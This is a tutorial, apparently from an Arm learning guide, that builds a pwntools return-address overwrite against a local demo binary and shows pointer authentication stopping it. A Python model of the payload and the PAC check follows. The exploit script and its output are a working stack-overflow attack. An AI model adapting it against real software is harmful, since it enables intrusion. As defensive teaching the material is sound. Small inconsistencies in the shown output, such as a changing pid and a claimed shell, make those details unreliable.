Install pwntools and its dependencies. You will use this exploit development library to overwrite the return address of the application built in the previous section, first in the build without pointer authentication (main_nopac) and then in the build with it (main_pac).
sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev -y
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools
Create exploit.py with the following content to attack the main_nopac application and cause func2() to be executed.
#!/usr/bin/env python3
from pwn import *

context(os='linux', arch='aarch64')
binary = ELF('./main_nopac')
rop = ROP(binary)

# Padding needed to reach the saved return address on the stack;
# the next 8 bytes overwrite it.
padding = b'A' * 24
rop.call(binary.symbols['func2']) # return to func2

print(rop.gadgets)
log.info("ROP chain:\n" + rop.dump())
print(rop.chain())

data = padding + rop.chain()
print(data)
# argv is a C string, so the payload cannot contain NUL bytes. Dropping the
# zero bytes of the address is harmless here: the binary is not PIE (loaded at
# 0x400000), so the upper bytes of the saved return address are already zero,
# and the terminator of the copied string supplies the next one.
data = data.replace(b'\0',b'')
print(data)

# Pass the payload as argv[1] and hand the terminal over to the process.
r = process(['./main_nopac', data])
r.interactive()
If necessary, make the script executable.
chmod +x ./exploit.py
Run the script, which exploits main_nopac:
./exploit.py
This should produce output similar to the following:
[*] '/home/ubuntu/pac/main_nopac'
Arch: aarch64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Loading gadgets for '/home/ubuntu/pac/main_nopac'
{4194964: Gadget(0x400294, ['ret'], [], 0x8), 4257924: Gadget(0x40f884, ['ret', 'ret'], [], 0x10)}
[*] ROP chain:
0x0000: 0x4006f8 0x4006f8()
b'\xf8\x06@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAA\xf8\x06@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAA\xf8\x06@'
[+] Starting local process './main_nopac': pid 4585
[*] Switching to interactive mode
Hello World!
Hello from func2!
$
You have successfully altered the execution flow of the program and jumped to address 0x4006f8 (func2).
The prompt is an interactive shell running inside the still-live main_nopac process:
$ ls
Makefile exploit.py main.c main_nopac main_pac
$
Use Ctrl+C to exit the shell, and hence the main_nopac application.
[*] Interrupted
[*] Stopped process './main_nopac' (pid 4618)
Use sed to replace the target binary name in the script, saving the result as a new file, exploit_pac.py:
sed 's/main_nopac/main_pac/g' exploit.py > exploit_pac.py
chmod +x exploit_pac.py
Now execute exploit_pac.py:
./exploit_pac.py
The script attempts the same attack:
[*] '/home/ubuntu/pac/main_pac'
Arch: aarch64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Loading gadgets for '/home/ubuntu/pac/main_pac'
{4194964: Gadget(0x400294, ['ret'], [], 0x8), 4257988: Gadget(0x40f8c4, ['ret', 'ret'], [], 0x10)}
[*] ROP chain:
0x0000: 0x4006fc 0x4006fc()
b'\xfc\x06@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAA\xfc\x06@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAA\xfc\x06@'
[+] Starting local process './main_pac': pid 4605
[*] Switching to interactive mode
Hello World!
[*] Got EOF while reading in interactive
$
The process has already crashed before any shell is spawned: the overwritten return address does not carry a valid pointer authentication code, so authenticating it on return fails and the return jumps to an invalid address, raising SIGSEGV. Typing at the prompt only reveals that the application has terminated:
$ ls
[*] Process './main_pac' stopped with exit code -11 (SIGSEGV) (pid 4605)
[*] Got EOF while sending in interactive
This demonstrates how the Armv8.3-A Pointer Authentication feature protects against return-oriented programming and other attacks that overwrite return addresses. Note what it does and does not do: the stack buffer in main_pac is still overflowed exactly as before, but the forged return address cannot be authenticated, so control never reaches func2.
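As an added example (not part of the original tutorial, and independent of pwntools and the real binaries), the following Python models both halves of the procedure above: the payload construction of exploit.py, including why stripping the NUL bytes still yields a complete return address in the non-PIE binary, and why the identical payload crashes main_pac. The frame layout, the original return address, the 48-bit address split and the HMAC-based PAC are illustrative assumptions; only the func2 address 0x4006f8 is taken from the page's output.

```python
#!/usr/bin/env python3
"""Model of the attack in exploit.py and of why it fails against main_pac.

Added example for this page, not part of the original tutorial. Everything
below the first constant is a simplifying model: the frame layout (16-byte
buffer, saved FP, saved LR) and the original return address are assumed, and
the PAC is a truncated HMAC standing in for the QARMA cipher the hardware uses.
"""
import hashlib
import hmac
import struct

FUNC2 = 0x4006F8            # func2 in main_nopac, from the page's ROP dump
ORIG_LR = 0x400700          # assumed: saved return address before the overflow
BUF_LEN = 16                # assumed: size of the overflowed stack buffer
VA_BITS = 48                # assumed: 48-bit virtual addresses, leaving 16 PAC bits
PAC_BITS = 64 - VA_BITS
APIA_KEY = b"assumed-APIAKey"   # stand-in for the per-process key the kernel holds


def build_payload(target: int, padding: int = 24) -> bytes:
    """Exactly what exploit.py does: padding, little-endian address, NULs stripped.

    argv entries are C strings, so the zero bytes of the address cannot be passed;
    the terminator written by strcpy re-creates one of them."""
    return (b"A" * padding + struct.pack("<Q", target)).replace(b"\0", b"")


def strcpy_into_frame(payload: bytes, saved_lr: int) -> int:
    """Simulate strcpy(buf, argv[1]) into an assumed frame laid out as
    [buf (BUF_LEN)][saved FP (8)][saved LR (8)]; return the saved LR afterwards."""
    frame = bytearray(BUF_LEN) + struct.pack("<QQ", 0, saved_lr)
    data = payload + b"\0"                # strcpy copies the terminator too
    assert len(data) <= len(frame), "model only covers the saved-LR overwrite"
    frame[: len(data)] = data             # the out-of-bounds write
    return struct.unpack_from("<Q", frame, BUF_LEN + 8)[0]


def pac(addr: int, modifier: int) -> int:
    """Toy PAC: keyed MAC over (address, modifier) truncated to PAC_BITS."""
    mac = hmac.new(APIA_KEY, struct.pack("<QQ", addr, modifier), hashlib.sha256).digest()
    return int.from_bytes(mac[:8], "little") & ((1 << PAC_BITS) - 1)


def sign(addr: int, modifier: int) -> int:
    """Model of paciasp: store the PAC in the unused upper bits of the pointer.
    The modifier is SP, so the same address gets a different PAC in each frame."""
    return addr | (pac(addr, modifier) << VA_BITS)


def authenticate(signed: int, modifier: int):
    """Model of autiasp: return (ok, pointer). On a mismatch the pointer is made
    non-canonical (bit 63 here; real cores use architected error bits), so the
    following ret faults with SIGSEGV."""
    addr = signed & ((1 << VA_BITS) - 1)
    ok = (signed >> VA_BITS) == pac(addr, modifier)
    return ok, addr if ok else addr | (1 << 63)


def attack_nopac() -> int:
    """main_nopac: the overwritten LR is used as-is, so the return lands on func2."""
    return strcpy_into_frame(build_payload(FUNC2), ORIG_LR)


def attack_pac(sp: int = 0x7FFF_FFFF_E000):
    """main_pac: the LR on the stack was signed with SP as modifier. The overflow
    replaces its low bytes but leaves the PAC of the *old* address in place, so
    authentication fails unless the two 16-bit PACs collide (probability 2**-16)."""
    signed_lr = sign(ORIG_LR, sp)
    smashed_lr = strcpy_into_frame(build_payload(FUNC2), signed_lr)
    return authenticate(smashed_lr, sp)


if __name__ == "__main__":
    print(f"nopac: ret -> {attack_nopac():#x} (func2 is {FUNC2:#x})")
    ok, target = attack_pac()
    print(f"pac:   authentication {'passed' if ok else 'FAILED'}, ret -> {target:#x}")
```

Run it with python3. The nopac path returns exactly the func2 address, reproducing the payload b'AAAAAAAAAAAAAAAAAAAAAAAA\xf8\x06@' shown earlier; the pac path reports a failed authentication and a non-canonical pointer, which is the model's equivalent of the SIGSEGV seen from main_pac. The 2**-16 collision chance is the margin PAC leaves for guessing when a target can be crashed and restarted many times, which is why the key and the SP modifier matter: neither is under the attacker's control from a plain argv overflow.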